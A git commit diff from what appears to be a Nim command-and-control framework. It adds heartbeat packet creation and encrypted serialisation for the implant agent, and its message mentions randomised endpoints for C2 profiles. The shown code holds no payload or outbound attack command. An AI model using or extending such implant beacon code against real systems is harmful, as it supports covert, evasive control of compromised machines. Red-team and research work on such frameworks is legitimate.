Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now.

2025-08-15 15:42:57 +02:00
parent 5a73c0f2f4
commit c7980d219d
19 changed files with 273 additions and 184 deletions
--- a/src/agent/protocol/heartbeat.nim
+++ b/src/agent/protocol/heartbeat.nim
@@ -0,0 +1,43 @@
+import times 
+
+import ../../common/[types, serialize, sequence, utils, crypto]
+
+proc createHeartbeat*(ctx: AgentCtx): Heartbeat = 
+    return Heartbeat(
+        header: Header(
+            magic: MAGIC,
+            version: VERSION, 
+            packetType: cast[uint8](MSG_HEARTBEAT),
+            flags: cast[uint16](FLAG_ENCRYPTED),
+            size: 0'u32,
+            agentId: uuidToUint32(ctx.agentId),
+            seqNr: 0'u32,  
+            iv: generateIV(),
+            gmac: default(AuthenticationTag)
+        ), 
+        listenerId: uuidToUint32(ctx.listenerId),
+        timestamp: uint32(now().toTime().toUnix())
+    )
+
+proc serializeHeartbeat*(ctx: AgentCtx, request: var Heartbeat): seq[byte] =
+
+    var packer = Packer.init()
+
+    # Serialize check-in / heartbeat request
+    packer 
+        .add(request.listenerId)
+        .add(request.timestamp)
+
+    let body = packer.pack()
+    packer.reset()
+
+    # Encrypt check-in / heartbeat request body 
+    let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, body, request.header.seqNr)
+
+    # Set authentication tag (GMAC)
+    request.header.gmac = gmac
+
+    # Serialize header
+    let header = packer.serializeHeader(request.header, uint32(encData.len))
+
+    return header & encData